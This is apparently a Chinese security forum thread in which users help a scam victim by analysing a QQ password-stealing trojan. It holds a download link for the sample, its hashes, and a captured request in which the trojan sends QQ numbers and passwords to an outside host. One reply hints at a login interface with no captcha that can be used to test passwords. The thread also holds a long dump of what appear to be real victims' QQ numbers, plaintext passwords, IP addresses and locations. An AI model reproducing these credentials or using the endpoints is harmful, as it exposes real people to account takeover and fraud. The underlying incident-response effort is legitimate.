朋友点开一个文件给骗30万准备自杀了 咋办

嘿嘿嘿嘿1 | 2013-12-06 20:15

朋友点开一个文件给骗30万求各路大神来帮忙

都准备跳楼自杀了,今天报案了就是说让等答复

现在求怎么办 他弄了一个假QQ让我朋友打钱 伪装成老总 我朋友也是一时大意 没有打电话和老总核对就打钱了 ,等到了11点左右的时候又叫打10万 ,我朋友感觉有点不对劲 打电话问老总结果一问就知道 给骗了然后马上报警 。经常查了30万到帐以后他马上打到15张卡上面然后全部取走了,现在他说他赔不起,想自杀了

求各路大神来解救一条人命

这个文件是昨天收到的 他不懂这个 点了下没有打开也没有在意 结果今天就出现这个事情了

木马文件下载地址 http://pan.baidu.com/s/1jB6z2

各位木马大牛。。出人命了。。核总。。救命啊。

小贱 (你懂的��������������������) | 2013-12-06 20:22



@mjj

@核总

别人急死了,我也是当个雷锋。。求大神。

木马下载地址

帮助下别人吧。。
相关讨论:

1#

小贱 (你懂的��������������������) | 2013-12-06 20:24

表示手机发的,。一下浪费。30m

2#

好人 (您已犯破坏计算机信息系统罪,请跟我们走一趟。) | 2013-12-06 20:24

@核攻击

3#

马丁 (我快要饿死了!!!!) | 2013-12-06 20:27

汇编牛帮忙扒一下后门的远程IP吧 最多就能这样了

4#

momo (Do-re-mi-fa-so-la-ti-do) | 2013-12-06 20:40

是点了文件被骗还是怎么被骗的?

看你标题说是点了文件被骗,

而你文中说是QQ聊天伪装成老板,然后被骗的。

你不说清楚,我们怎么帮你?

5#

GrayTrack (强大到惊人) | 2013-12-06 20:48

@核攻击

6#

小贱 (你懂的��������������������) | 2013-12-06 20:54

@momo 点了文件。然后。伪装老板的qq要他打钱

7#

momo (Do-re-mi-fa-so-la-ti-do) | 2013-12-06 21:10

@小贱 @嘿嘿嘿嘿1 感觉是熟人雇的黑客弄的,

不然他:

怎么知道你朋友是干什么的?

怎么知道你朋友的老板是谁?

怎么要搞你朋友然后拉你朋友的老板黑名单?

怎么知道你朋友老板的语气?

怎么知道你朋友和你朋友的老板及其公司的那么多事情?

怎么知道你朋友手里有老板给他的钱?

这么多疑点,难道JCSS和你们都没有察觉还是?

8#

Marsevil (ฏ๎๎๎๎๎๎๎๎๎ฏ๎๎๎๎๎๎ด้้้้้็็) | 2013-12-06 21:13

30w报警啊,丢虚拟机抓出服务端上线域名,再通过域名查IP,和大概的上线时间,找警察蜀黍一查就出地址了,当然如果对方用了n层跳板就不说了。通过 钱的流向也可以追踪到对方的,就看警察蜀黍愿不愿查下去而已

9#

momo (Do-re-mi-fa-so-la-ti-do) | 2013-12-06 21:21

看这个:http://zone.wooyun.org/content/8883 明天工具细分下,先睡觉了。

10#

seul (你为什么要成为黑客啊 多么痛的领悟) | 2013-12-06 21:47

围观大牛趴内裤

11#

小贱 (你懂的��������������������) | 2013-12-06 21:59

http://whois.chinaz.com/www.hnjfd.net

没信息。

相关讨论:

1#

Csser | 2013-12-06 20:19

你朋友简直是太太太太太太太太太太太太太太太太太太大意了,这么大的金额。

最后还是要坚强。。。。。

2#

马丁 (我快要饿死了!!!!) | 2013-12-06 20:23

@Csser 有贬义也有褒义 可以看出这是他对老板的一种信任

3#

momo (Do-re-mi-fa-so-la-ti-do) | 2013-12-06 20:39

是点了文件被骗还是怎么被骗的?

看你标题说是点了文件被骗,

而你文中说是QQ聊天伪装成老板,然后被骗的。

你不说清楚,我们怎么帮你?

4#

嘿嘿嘿嘿1 | 2013-12-06 20:52

@momo 是点了文件以后 然后第二天我朋友的QQ里面老总的QQ其实不是老总的 是那个人的 老总的在黑名单里面 他的QQ头像和个人说明 备注之类的和我朋友老总的一模一样 所以才导致给这样子的后果

5#

摸了你 | 2013-12-06 20:56

30w,我去高富帅...

6#

momo (Do-re-mi-fa-so-la-ti-do) | 2013-12-06 21:10

@嘿嘿嘿嘿1 感觉是熟人雇的黑客弄的,

不然他:

怎么知道你朋友是干什么的?

怎么知道你朋友的老板是谁?

怎么要搞你朋友然后拉你朋友的老板黑名单?

怎么知道你朋友老板的语气?

怎么知道你朋友和你朋友的老板及其公司的那么多事情?

怎么知道你朋友手里有老板给他的钱?

这么多疑点,难道JCSS和你们都没有察觉还是?

7#

momo (Do-re-mi-fa-so-la-ti-do) | 2013-12-06 21:13

下载了这个程序第一眼看到就是个远控的马。待我继续分析下。

8#

Marsevil (ฏ๎๎๎๎๎๎๎๎๎ฏ๎๎๎๎๎๎ด้้้้้็็) | 2013-12-06 21:16

这么多钱,就不电话核实一下先么?

9#

嘿嘿嘿嘿1 | 2013-12-06 21:16

@momo 谢谢

10#

momo (Do-re-mi-fa-so-la-ti-do) | 2013-12-06 21:17

文件名称:同学照.exe

MD5:bbc84ba22c95d9c1e074d3954041b7ec

Sha-1:f394c524631b5dbd6cc684a3972b7e55710a09ac

文件大小:328KB

创建时间:2013-12-06 20:58:37

文件类型:EXE

PEID信息:ASPack 2.12 -> Alexey Solodovnikov

文件描述:Uninstallb Microsoft 基础类应用程序

文件版本:1, 0, 0, 1

版权所有:版权所有 (C) 2003

原始文件名:Uninstallb.EXE

产品名称:Uninstallb 应用程序

产品版本:1, 0, 0, 1

疑似QQ盗号木马;隐藏指定窗口

行为描述:疑似QQ盗号木马

附加信息:

行为描述:隐藏指定窗口

附加信息:Afx:400000:8:10011:1900015:0 : [同学照.exe]Afx:400000🅱️10011:1900015:0 : [同学照.exe]Edit : [同学照.exe]

运行了之后会出现:

11#

闪电小子 | 2013-12-06 21:35

http://w.159.com/WapBro/Client/WAPBrowser.aspx?url=pt.3g.qq.com/json/login3gonly.jsp?qq=61708xxxx&md5p=efe6398127928f1b2e9ef3207fb82663&callback=Mqq.util.login.resHandler&r=5485

暂时发现通过这个接口来验证密码是否正确,可能就是w.159.com对这个密码记录了,这个密码是md5加密的。而且不需要验证码,意义大家都知道的。

12#

小威 (www.foxck.com) | 2013-12-06 21:40

我怎么就没有这么傻的朋友?

13#

EDI | 2013-12-06 21:40

缺乏基本知识 我感觉也是预谋

14#

sdj (男人分三种,第一种是用假名牌来掩饰身份,第二种是用真名牌类衬托身份,而第三种,则是用身份来衬托身上的假名牌。) | 2013-12-06 21:51

POST http://www.id70.com/yuan/ HTTP/1.0

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-

powerpoint, application/msword, /

Referer: http://www.id70.com/yuan/

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Content-Length: 242

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Host: www.id70.com

Pragma: no-cache

Proxy-Authorization: Basic RTIyMjAyODNFOjAyMjI4MjM1NQ==

domain=www.hnjfd.net/aad58otrr/mess.asp?QQNumber=1xxxxxxxxxx&QQPassword=x**********&ip=1xx.xxx.xxx.xx&adr=中国X省XXX市

15#

永久VIP (我注册了一个账号,但他变成了VIP!) | 2013-12-06 21:57

@sdj">sdj 碉堡了!

16#

小贱 (你懂的��������������������) | 2013-12-06 21:58

http://whois.chinaz.com/www.hnjfd.net

没信息啊。。艹

17#

李旭敏 | 2013-12-06 22:02

@闪电小子 @sdj">sdj 抓包完胜逆向啊

18#

daige13 | 2013-12-06 22:35

报案了吧

19#

廷廷 (想法最重要) | 2013-12-06 23:14

牛 希望能捉拿归案··

20#

px1624 (aaaaaaaaa) | 2013-12-06 23:25

怎么感觉挂个360或者qq管家都会直接秒掉的吧。。而且听你的意思还是你朋友给人家主动打的钱,和这个木马有啥关系。。

21#

applychen | 2013-12-07 00:05

不按照财务规章办事就是这个后果!

22#

only_guest (PKAV-誓与AV抢宅男!) | 2013-12-07 01:22

http://www.hnjfd.net/aac79jgfs/mess.asp?QQNumber=260108213&QQPassword=Gy199306&ip=113.200.81.34&adr=%E4%B8%AD%E5%9B%BD%E9%99%95%E8%A5%BF%E7%9C%81

http://www.hnjfd.net/ff36ydws/mess.asp?QQNumber=307890620&QQPassword=BBMM520-1314&ip=182.85.232.189&adr=%E4%B8%AD%E5%9B%BD%E6%B1%9F%E8%A5%BF%E7%9C%81%E5%8D%97%E6%98%8C%E5%B8%82

http://www.hnjfd.net/aaa28jddg/mess.asp?QQNumber=1508939617&QQPassword=1234567HUANG&ip=218.65.61.89&adr=%E4%B8%AD%E5%9B%BD%E6%B1%9F%E8%A5%BF%E7%9C%81%E6%99%AF%E5%BE%B7%E9%95%87%E5%B8%82

http://www.hnjfd.net/aac36lifs/mess.asp?QQNumber=315427482&QQPassword=zenglinchao521&ip=59.52.236.54&adr=%E4%B8%AD%E5%9B%BD%E6%B1%9F%E8%A5%BF%E7%9C%81%E5%8D%97%E6%98%8C%E5%B8%82

http://www.hnjfd.net/aad20koie/mess.asp?QQNumber=123562630&QQPassword=wangshihe411&ip=115.195.173.2&adr=%E4%B8%AD%E5%9B%BD%E6%B5%99%E6%B1%9F%E7%9C%81%E6%9D%AD%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/aaa46hfgh/mess.asp?QQNumber=1264884358&QQPassword=111222333&ip=112.115.225.138&adr=%E4%B8%AD%E5%9B%BD%E4%BA%91%E5%8D%97%E7%9C%81%E6%98%86%E6%98%8E%E5%B8%82

http://www.hnjfd.net/aad53hdtj/mess.asp?QQNumber=1101122560&QQPassword=2013LLJ&ip=218.18.66.158&adr=%E4%B8%AD%E5%9B%BD%E5%B9%BF%E4%B8%9C%E7%9C%81%E6%B7%B1%E5%9C%B3%E5%B8%82

http://www.hnjfd.net/aac93ujfr/mess.asp?QQNumber=1229585950&QQPassword=13257998738&ip=14.156.251.95&adr=%E4%B8%AD%E5%9B%BD%E5%B9%BF%E4%B8%9C%E7%9C%81%E4%B8%9C%E8%8E%9E%E5%B8%82

http://www.hnjfd.net/aac79jgfs/mess.asp?QQNumber=2232462834&QQPassword=zzm2232462834!&ip=221.213.45.163&adr=%E4%B8%AD%E5%9B%BD%E4%BA%91%E5%8D%97%E7%9C%81%E6%98%86%E6%98%8E%E5%B8%82

http://www.hnjfd.net/ff36ydws/mess.asp?QQNumber=568353212&QQPassword=162534benxiong&ip=182.85.232.189&adr=%E4%B8%AD%E5%9B%BD%E6%B1%9F%E8%A5%BF%E7%9C%81%E5%8D%97%E6%98%8C%E5%B8%82

http://www.hnjfd.net/aac92tret/mess.asp?QQNumber=642678605&QQPassword=24306085211314&ip=113.200.81.34&adr=%E4%B8%AD%E5%9B%BD%E9%99%95%E8%A5%BF%E7%9C%81

http://www.hnjfd.net/ssa78itre/mess.asp?QQNumber=634150167&QQPassword=woailima&ip=197.156.111.5&adr=%E5%9F%83%E5%A1%9E%E4%BF%84%E6%AF%94%E4%BA%9A

http://www.hnjfd.net/aab99jkif/mess.asp?QQNumber=704865123&QQPassword=13768542421&ip=103.244.149.28&adr=%E6%82%A8%E7%9A%84%49%50%E6%B2%A1%E6%9C%89%E5%88%86%E4%BA%AB%E8%AE%B0%E5%BD%95%2C

http://www.hnjfd.net/aac29iktr/mess.asp?QQNumber=263137280&QQPassword=258wweaazzxx&ip=220.173.64.98&adr=%E4%B8%AD%E5%9B%BD%E5%B9%BF%E8%A5%BF%E6%9F%B3%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/aad84hfdj/mess.asp?QQNumber=1326141683&QQPassword=foreverkimbum&ip=123.84.231.85&adr=%E4%B8%AD%E5%9B%BD%E6%B9%96%E5%8D%97%E7%9C%81%E9%83%B4%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/aad33reyr/mess.asp?QQNumber=847255099&QQPassword=daohaorinima&ip=183.63.25.6&adr=%E4%B8%AD%E5%9B%BD%E5%B9%BF%E4%B8%9C%E7%9C%81

http://www.hnjfd.net/aad45ghdh/mess.asp?QQNumber=970881437&QQPassword=18997308661.ycm&ip=110.167.231.2&adr=%E4%B8%AD%E5%9B%BD%E9%9D%92%E6%B5%B7%E7%9C%81%E8%A5%BF%E5%AE%81%E5%B8%82

http://www.hnjfd.net/aad41ydyj/mess.asp?QQNumber=970585699&QQPassword=1a33b23c45678901&ip=122.49.48.70&adr=%E4%B8%AD%E5%9B%BD%E5%8C%97%E4%BA%AC%E5%B8%82

http://www.hnjfd.net/aab35jgfj/mess.asp?QQNumber=757028487&QQPassword=ztt1314520&ip=123.174.46.141&adr=%E4%B8%AD%E5%9B%BD%E5%B1%B1%E8%A5%BF%E7%9C%81%E8%BF%90%E5%9F%8E%E5%B8%82

http://www.hnjfd.net/aab52gdsg/mess.asp?QQNumber=995127635&QQPassword=RSRZRCJ520!&ip=119.4.174.238&adr=%E4%B8%AD%E5%9B%BD%E5%9B%9B%E5%B7%9D%E7%9C%81%E6%88%90%E9%83%BD%E5%B8%82

http://www.hnjfd.net/ssa83fdfh/mess.asp?QQNumber=1517441786&QQPassword=abcd123&ip=121.31.246.24&adr=%E4%B8%AD%E5%9B%BD%E5%B9%BF%E8%A5%BF%E9%98%B2%E5%9F%8E%E6%B8%AF%E5%B8%82

http://www.hnjfd.net/fc50ndms/mess.asp?QQNumber=1038150214&QQPassword=jie-191826&ip=27.42.185.140&adr=%E4%B8%AD%E5%9B%BD%E5%B9%BF%E4%B8%9C%E7%9C%81%E4%B8%AD%E5%B1%B1%E5%B8%82

http://www.hnjfd.net/aad55jfdd/mess.asp?QQNumber=1213540119&QQPassword=tvxqonly55555w&ip=120.128.5.23&adr=%E4%B8%AD%E5%9B%BD%E5%B1%B1%E4%B8%9C%E7%9C%81

http://www.hnjfd.net/aac12dhkg/mess.asp?QQNumber=1903571602&QQPassword=jingcai&ip=24.68.109.93&adr=%E5%8A%A0%E6%8B%BF%E5%A4%A7

http://www.hnjfd.net/aaa99koie/mess.asp?QQNumber=185172322&QQPassword=abccbd690922ll&ip=1.207.200.213&adr=%E4%B8%AD%E5%9B%BD%E8%B4%B5%E5%B7%9E%E7%9C%81%E9%93%9C%E4%BB%81%E5%9C%B0%E5%8C%BA

http://www.hnjfd.net/aab25yfdh/mess.asp?QQNumber=330897682&QQPassword=th555sky&ip=58.250.24.180&adr=%E4%B8%AD%E5%9B%BD%E5%B9%BF%E4%B8%9C%E7%9C%81%E6%B7%B1%E5%9C%B3%E5%B8%82

http://www.hnjfd.net/aad45ghdh/mess.asp?QQNumber=1120260002&QQPassword=huiyiguoqu2013&ip=111.85.60.237&adr=%E4%B8%AD%E5%9B%BD%E8%B4%B5%E5%B7%9E%E7%9C%81%E6%AF%95%E8%8A%82%E5%9C%B0%E5%8C%BA

http://www.hnjfd.net/ff77udaa/mess.asp?QQNumber=2655097178&QQPassword=13114673535**&ip=1.63.57.4&adr=%E4%B8%AD%E5%9B%BD%E9%BB%91%E9%BE%99%E6%B1%9F%E7%9C%81

http://www.hnjfd.net/aad11gfdg/mess.asp?QQNumber=81214660&QQPassword=MENG13562917198&ip=110.195.248.35&adr=%E4%B8%AD%E5%9B%BD%E5%B1%B1%E4%B8%9C%E7%9C%81%E4%B8%B4%E6%B2%82%E5%B8%82

http://www.hnjfd.net/aad41ydyj/mess.asp?QQNumber=597551600&QQPassword=1516230249m,&ip=182.37.141.144&adr=%E4%B8%AD%E5%9B%BD%E5%B1%B1%E4%B8%9C%E7%9C%81%E4%B8%B4%E6%B2%82%E5%B8%82

http://www.hnjfd.net/aac59kief/mess.asp?QQNumber=154791565&QQPassword=19810908@dudu&ip=60.24.227.238&adr=%E4%B8%AD%E5%9B%BD%E5%A4%A9%E6%B4%A5%E5%B8%82

http://www.hnjfd.net/fe33fgsz/mess.asp?QQNumber=441844314&QQPassword=20110111he&ip=122.194.13.130&adr=%E4%B8%AD%E5%9B%BD%E6%B1%9F%E8%8B%8F%E7%9C%81%E8%8B%8F%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/aad17jrre/mess.asp?QQNumber=930231648&QQPassword=moxinzhi5201314&ip=113.64.159.134&adr=%E4%B8%AD%E5%9B%BD%E5%B9%BF%E4%B8%9C%E7%9C%81%E5%B9%BF%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/aac60orwv/mess.asp?QQNumber=1021891875&QQPassword=wanxiang06180804&ip=115.60.190.250&adr=%E4%B8%AD%E5%9B%BD%E6%B2%B3%E5%8D%97%E7%9C%81%E9%83%91%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/aad80iikm/mess.asp?QQNumber=1159397113&QQPassword=A1994100613579&ip=61.136.151.254&adr=%E4%B8%AD%E5%9B%BD%E6%B9%96%E5%8C%97%E7%9C%81%E5%AE%9C%E6%98%8C%E5%B8%82

http://www.hnjfd.net/aad53hdtj/mess.asp?QQNumber=1214880903&QQPassword=q213213&ip=112.97.37.160&adr=%E4%B8%AD%E5%9B%BD%E5%B9%BF%E4%B8%9C%E7%9C%81%E6%B7%B1%E5%9C%B3%E5%B8%82

http://www.hnjfd.net/ff36ydws/mess.asp?QQNumber=395184677&QQPassword=222liaoshang&ip=101.7.244.32&adr=%E4%B8%AD%E5%9B%BD%E6%B2%B3%E5%8C%97%E7%9C%81

http://www.hnjfd.net/aaa212tew/mess.asp?QQNumber=171472415&QQPassword=CCTV341623&ip=120.209.27.18&adr=%E4%B8%AD%E5%9B%BD%E5%AE%89%E5%BE%BD%E7%9C%81%E9%98%9C%E9%98%B3%E5%B8%82

http://www.hnjfd.net/aad17jrre/mess.asp?QQNumber=260994582&QQPassword=moxinzhi5201314&ip=113.64.159.134&adr=%E4%B8%AD%E5%9B%BD%E5%B9%BF%E4%B8%9C%E7%9C%81%E5%B9%BF%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/aad45ghdh/mess.asp?QQNumber=850975019&QQPassword=YAYA5211314.&ip=113.140.83.110&adr=%E4%B8%AD%E5%9B%BD%E9%99%95%E8%A5%BF%E7%9C%81%E8%A5%BF%E5%AE%89%E5%B8%82

http://www.hnjfd.net/abc654321/mess.asp?QQNumber=442644064&QQPassword=qq1234556&ip=103.17.116.91&adr=%E6%82%A8%E7%9A%84%49%50%E6%B2%A1%E6%9C%89%E5%88%86%E4%BA%AB%E8%AE%B0%E5%BD%95%2C

http://www.hnjfd.net/aac59kief/mess.asp?QQNumber=154791565&QQPassword=123456@&ip=60.24.227.238&adr=%E4%B8%AD%E5%9B%BD%E5%A4%A9%E6%B4%A5%E5%B8%82

http://www.hnjfd.net/aad84hfdj/mess.asp?QQNumber=834412138&QQPassword=wyb123789@$&ip=202.101.102.199&adr=%E4%B8%AD%E5%9B%BD%E7%A6%8F%E5%BB%BA%E7%9C%81%E7%A6%8F%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/aad84hfdj/mess.asp?QQNumber=2397468198&QQPassword=123456.&ip=182.88.23.96&adr=%E4%B8%AD%E5%9B%BD%E5%B9%BF%E8%A5%BF%E5%8D%97%E5%AE%81%E5%B8%82

http://www.hnjfd.net/fg48itrex/mess.asp?QQNumber=746148258&QQPassword=yi15111092237&ip=118.251.133.5&adr=%E4%B8%AD%E5%9B%BD%E6%B9%96%E5%8D%97%E7%9C%81%E6%B9%98%E6%BD%AD%E5%B8%82

http://www.hnjfd.net/aad45ghdh/mess.asp?QQNumber=1060032316&QQPassword=zc199501310000&ip=111.164.201.246&adr=%E4%B8%AD%E5%9B%BD%E5%A4%A9%E6%B4%A5%E5%B8%82

http://www.hnjfd.net/aad45ghdh/mess.asp?QQNumber=1060032316&QQPassword=zc199501310000&ip=111.161.171.29&adr=%E4%B8%AD%E5%9B%BD%E5%A4%A9%E6%B4%A5%E5%B8%82

http://www.hnjfd.net/aad55jfdd/mess.asp?QQNumber=497491384&QQPassword=xiazhiweizhi!101&ip=171.37.210.49&adr=%E4%B8%AD%E5%9B%BD%E5%B9%BF%E8%A5%BF%E5%8D%97%E5%AE%81%E5%B8%82

http://www.hnjfd.net/aaa01ityf/mess.asp?QQNumber=287697774&QQPassword=sorry361531.&ip=1.86.241.26&adr=%E4%B8%AD%E5%9B%BD%E9%99%95%E8%A5%BF%E7%9C%81%E8%A5%BF%E5%AE%89%E5%B8%82

http://www.hnjfd.net/aab52gdsg/mess.asp?QQNumber=489439208&QQPassword=tianya4210237275&ip=113.67.158.254&adr=%E4%B8%AD%E5%9B%BD%E5%B9%BF%E4%B8%9C%E7%9C%81%E5%B9%BF%E5%B7%9E%E5%B8%82

有你朋友的号码么?

23#

CplusHua (都是被逼的~) | 2013-12-07 01:27

这个病毒样本出现有半年了,我之前分析过,之前曾在QQ群大肆传播。后来应该就被查杀了,楼主的朋友是不是没有开启防病毒软件呢?

惋惜楼主的朋友~

24#感谢(1)

only_guest (PKAV-誓与AV抢宅男!) | 2013-12-07 01:27

http://www.hnjfd.net/fe95hdbb/mess.asp?QQNumber=1425424142&QQPassword=1314fei.&ip=124.167.255.206&adr=%E4%B8%AD%E5%9B%BD%E5%B1%B1%E8%A5%BF%E7%9C%81%E6%9C%94%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/aaa91tety/mess.asp?QQNumber=757224619&QQPassword=foreverEM@&ip=59.175.233.222&adr=%E4%B8%AD%E5%9B%BD%E6%B9%96%E5%8C%97%E7%9C%81%E6%AD%A6%E6%B1%89%E5%B8%82

http://www.hnjfd.net/aac92tret/mess.asp?QQNumber=924343509&QQPassword=2389866kejiarui&ip=59.61.217.154&adr=%E4%B8%AD%E5%9B%BD%E7%A6%8F%E5%BB%BA%E7%9C%81%E6%B3%89%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/aab25yfdh/mess.asp?QQNumber=826834069&QQPassword=NOKIAe66&ip=125.87.67.232&adr=%E4%B8%AD%E5%9B%BD%E9%87%8D%E5%BA%86%E5%B8%82

http://www.hnjfd.net/aaa52ngdh/mess.asp?QQNumber=774590172&QQPassword=cyq13820978842&ip=125.39.179.121&adr=%E4%B8%AD%E5%9B%BD%E5%A4%A9%E6%B4%A5%E5%B8%82

http://www.hnjfd.net/aad83gyer/mess.asp?QQNumber=569228428&QQPassword=wmh521bb12519941&ip=124.235.239.151&adr=%E4%B8%AD%E5%9B%BD%E5%90%89%E6%9E%97%E7%9C%81%E9%95%BF%E6%98%A5%E5%B8%82

http://www.hnjfd.net/aaa33gfdj/mess.asp?QQNumber=912705104&QQPassword=yt05050211lq&ip=111.37.8.189&adr=%E4%B8%AD%E5%9B%BD

http://www.hnjfd.net/aad83gyer/mess.asp?QQNumber=1014358503&QQPassword=zhangshuhui0416&ip=124.235.239.151&adr=%E4%B8%AD%E5%9B%BD%E5%90%89%E6%9E%97%E7%9C%81%E9%95%BF%E6%98%A5%E5%B8%82

http://www.hnjfd.net/aab37juef/mess.asp?QQNumber=1499268388&QQPassword=x123456&ip=112.65.143.138&adr=%E4%B8%AD%E5%9B%BD%E4%B8%8A%E6%B5%B7%E5%B8%82

http://www.hnjfd.net/aaa34hjfg/mess.asp?QQNumber=826746535&QQPassword=myn2655508&ip=222.172.225.110&adr=%E4%B8%AD%E5%9B%BD%E4%BA%91%E5%8D%97%E7%9C%81%E6%98%86%E6%98%8E%E5%B8%82

http://www.hnjfd.net/aab25yfdh/mess.asp?QQNumber=506827028&QQPassword=huang654321&ip=120.43.252.126&adr=%E4%B8%AD%E5%9B%BD%E7%A6%8F%E5%BB%BA%E7%9C%81%E6%B3%89%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/aad81yert/mess.asp?QQNumber=2652387286&QQPassword=71002897100289e&ip=124.114.202.22&adr=%E4%B8%AD%E5%9B%BD%E9%99%95%E8%A5%BF%E7%9C%81%E8%A5%BF%E5%AE%89%E5%B8%82

http://www.hnjfd.net/aab64yhuj/mess.asp?QQNumber=1445734003&QQPassword=hujunjian521&ip=14.123.154.131&adr=%E4%B8%AD%E5%9B%BD%E5%B9%BF%E4%B8%9C%E7%9C%81

http://www.hnjfd.net/aab64yhuj/mess.asp?QQNumber=2896361902&QQPassword=hujunjian456&ip=14.123.154.131&adr=%E4%B8%AD%E5%9B%BD%E5%B9%BF%E4%B8%9C%E7%9C%81

http://www.hnjfd.net/aab66uirf/mess.asp?QQNumber=237917147&QQPassword=azmat074546&ip=218.31.59.37&adr=%E4%B8%AD%E5%9B%BD%E6%96%B0%E7%96%86%E6%98%8C%E5%90%89%E5%B7%9E

http://www.hnjfd.net/ssa51rraa/mess.asp?QQNumber=9950317&QQPassword=qingchengYYzyq&ip=116.226.79.148&adr=%E4%B8%AD%E5%9B%BD%E4%B8%8A%E6%B5%B7%E5%B8%82

http://www.hnjfd.net/ssa51rraa/mess.asp?QQNumber=903327967&QQPassword=qingchengYYZYQ&ip=116.226.79.148&adr=%E4%B8%AD%E5%9B%BD%E4%B8%8A%E6%B5%B7%E5%B8%82

http://www.hnjfd.net/aac41gfdj/mess.asp?QQNumber=975910025&QQPassword=19860103hao&ip=183.26.159.170&adr=%E4%B8%AD%E5%9B%BD%E5%B9%BF%E4%B8%9C%E7%9C%81%E4%BD%9B%E5%B1%B1%E5%B8%82

http://www.hnjfd.net/aac59kief/mess.asp?QQNumber=375215639&QQPassword=820324820324&ip=115.223.11.86&adr=%E4%B8%AD%E5%9B%BD%E6%B5%99%E6%B1%9F%E7%9C%81%E6%B8%A9%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/aad35hdjf/mess.asp?QQNumber=2496796195&QQPassword=18700338077&ip=113.200.253.146&adr=%E4%B8%AD%E5%9B%BD%E9%99%95%E8%A5%BF%E7%9C%81

http://www.hnjfd.net/aad35hdjf/mess.asp?QQNumber=1569230525&QQPassword=18791951073&ip=113.200.253.146&adr=%E4%B8%AD%E5%9B%BD%E9%99%95%E8%A5%BF%E7%9C%81

http://www.hnjfd.net/aab18jism/mess.asp?QQNumber=1136627622&QQPassword=axhmaxhmta638356&ip=219.155.204.92&adr=%E4%B8%AD%E5%9B%BD%E6%B2%B3%E5%8D%97%E7%9C%81%E9%83%91%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/fg26ufed/mess.asp?QQNumber=973940045&QQPassword=40045xia&ip=110.114.103.153&adr=%E4%B8%AD%E5%9B%BD%E6%B9%96%E5%8C%97%E7%9C%81%E6%AD%A6%E6%B1%89%E5%B8%82

http://www.hnjfd.net/aad41ydyj/mess.asp?QQNumber=571155946&QQPassword=WB662280&ip=36.62.161.226&adr=%E4%B8%AD%E5%9B%BD%E5%AE%89%E5%BE%BD%E7%9C%81%E5%90%88%E8%82%A5%E5%B8%82

http://www.hnjfd.net/aab39ikwf/mess.asp?QQNumber=522150663&QQPassword=xinshuiguo178&ip=118.112.188.81&adr=%E4%B8%AD%E5%9B%BD%E5%9B%9B%E5%B7%9D%E7%9C%81%E6%88%90%E9%83%BD%E5%B8%82

http://www.hnjfd.net/sss49oret/mess.asp?QQNumber=740734101&QQPassword=woaixuexue&ip=59.175.236.30&adr=%E4%B8%AD%E5%9B%BD%E6%B9%96%E5%8C%97%E7%9C%81%E6%AD%A6%E6%B1%89%E5%B8%82

http://www.hnjfd.net/aad32yeri/mess.asp?QQNumber=623056439&QQPassword=ty13594433222ty&ip=125.84.219.47&adr=%E4%B8%AD%E5%9B%BD%E9%87%8D%E5%BA%86%E5%B8%82

http://www.hnjfd.net/aad48jdfs/mess.asp?QQNumber=2215636403&QQPassword=1a2b3c4d.&ip=218.29.12.50&adr=%E4%B8%AD%E5%9B%BD%E6%B2%B3%E5%8D%97%E7%9C%81%E5%8D%97%E9%98%B3%E5%B8%82

http://www.hnjfd.net/aaa83gdsg/mess.asp?QQNumber=303793695&QQPassword=499255anbaobin&ip=117.81.119.26&adr=%E4%B8%AD%E5%9B%BD%E6%B1%9F%E8%8B%8F%E7%9C%81%E8%8B%8F%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/aad41ydyj/mess.asp?QQNumber=970020118&QQPassword=ay780818&ip=182.84.155.117&adr=%E4%B8%AD%E5%9B%BD%E6%B1%9F%E8%A5%BF%E7%9C%81%E8%B5%A3%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/aaa83gdsg/mess.asp?QQNumber=594563238&QQPassword=19871212guoguo&ip=1.192.145.206&adr=%E4%B8%AD%E5%9B%BD%E6%B2%B3%E5%8D%97%E7%9C%81%E9%83%91%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/aad84hfdj/mess.asp?QQNumber=714362453&QQPassword=liwxni920908&ip=180.156.201.5&adr=%E4%B8%AD%E5%9B%BD%E4%B8%8A%E6%B5%B7%E5%B8%82

http://www.hnjfd.net/aab52gdsg/mess.asp?QQNumber=1311588267&QQPassword=987963520140&ip=222.247.155.15&adr=%E4%B8%AD%E5%9B%BD%E6%B9%96%E5%8D%97%E7%9C%81%E9%95%BF%E6%B2%99%E5%B8%82

http://www.hnjfd.net/aaa83gdsg/mess.asp?QQNumber=850655874&QQPassword=871212xiejingjin&ip=1.192.145.206&adr=%E4%B8%AD%E5%9B%BD%E6%B2%B3%E5%8D%97%E7%9C%81%E9%83%91%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/ssa78itre/mess.asp?QQNumber=1014266970&QQPassword=123456sjt&ip=221.231.116.51&adr=%E4%B8%AD%E5%9B%BD%E6%B1%9F%E8%8B%8F%E7%9C%81%E7%9B%90%E5%9F%8E%E5%B8%82

http://www.hnjfd.net/aad20koie/mess.asp?QQNumber=47617466&QQPassword=19851006520&ip=60.216.4.5&adr=%E4%B8%AD%E5%9B%BD%E5%B1%B1%E4%B8%9C%E7%9C%81%E6%B5%8E%E5%8D%97%E5%B8%82

http://www.hnjfd.net/ff45sdgh/mess.asp?QQNumber=634744467&QQPassword=1230..&ip=218.6.221.115&adr=%E4%B8%AD%E5%9B%BD%E5%9B%9B%E5%B7%9D%E7%9C%81%E4%B9%90%E5%B1%B1%E5%B8%82

http://www.hnjfd.net/aac41gfdj/mess.asp?QQNumber=1021727846&QQPassword=20030707ff&ip=183.26.159.170&adr=%E4%B8%AD%E5%9B%BD%E5%B9%BF%E4%B8%9C%E7%9C%81%E4%BD%9B%E5%B1%B1%E5%B8%82

